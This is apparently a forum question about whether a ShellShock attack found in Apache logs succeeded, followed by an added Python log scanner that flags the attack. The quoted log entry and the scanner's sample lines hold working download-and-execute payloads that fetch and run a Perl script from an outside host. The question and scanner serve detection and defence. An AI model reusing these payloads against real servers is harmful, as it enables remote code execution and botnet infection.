Looking through my web server logs, I noticed two different ShellShock attacks on my server, both of which generated an HTTP 200 OK response code. They look like this (IP address/date and time redacted):
223.252.35.159 - - [************] "GET / HTTP/1.1" 200 2203 "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/ ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \"" "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/ ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \""
My bash version is 4.2.37 and we do regularly update this server through apt-get update && apt-get dist-upgrade along with daily log file analysis. Apache 2.2.22 is being used and only port 80 is open. The file downloaded appears to be an IRC script which I can only imagine is used for flooding purposes in this context.
Trying to run x='() { :;}; echo VULNERABLE' bash -c : (from "Is there a short command to test if my server is secure against the shellshock bash bug?") returns nothing, but running ps -p $$ from an SSH terminal shows a bash shell currently in use.
The question is: is it likely that the exploit worked given the above?
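An added example, not part of the original post: a Python scan of Apache combined-format access log lines for the `() {` function-definition prefix seen in the entry above, reporting which header field carried it, the logged status code, and any URLs passed to wget or curl. The sample lines, their addresses and the name `find_shellshock` are constructed for illustration.

```python
import re

# One double-quoted log field; the value may contain backslash-escaped quotes.
Q = r'"(?P<%s>(?:[^"\\]|\\.)*)"'
# Apache "combined" format: client, identd, user, [time], request, status, size, referer, agent.
LINE_RE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] ' + Q % "request"
    + r' (?P<status>\d{3}) \S+ ' + Q % "referer" + " " + Q % "agent"
)
MARKER = re.compile(r'\(\)\s*\{')  # bash function-definition prefix "() {"
FETCH = re.compile(r'\b(?:wget|curl)\s+(?:-\S+\s+)*([^\s;"\\]+)')  # download target

# Constructed sample log lines (documentation-range addresses, made-up timestamps).
SAMPLE = [
    r'192.0.2.10 - - [01/Oct/2014:10:00:00 +0000] "GET / HTTP/1.1" 200 2203 "-" "Mozilla/5.0"',
    r'192.0.2.66 - - [01/Oct/2014:10:00:05 +0000] "GET / HTTP/1.1" 200 2203 '
    r'"() { :;}; /bin/bash -c \"cd /var/tmp; wget 198.51.100.7/den;perl den; echo \"" '
    r'"() { :;}; /bin/bash -c \"curl -sO 198.51.100.7/den;perl den; echo \""',
]

def find_shellshock(lines):
    """Return one record per log line whose request, referer or agent holds the marker."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        fields = [f for f in ("request", "referer", "agent") if MARKER.search(m[f])]
        if not fields:
            continue
        payload = " ".join(m[f] for f in fields)
        hits.append({
            "client": m["client"],
            "status": int(m["status"]),
            "fields": fields,
            # Download targets named in the payload: candidates to look for on
            # disk and in outbound connection logs.
            "fetched": sorted(set(FETCH.findall(payload))),
        })
    return hits

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE):
        print(hit)
```

The status in each record is the response logged for the requested URL; it does not record whether the header content was ever passed to bash.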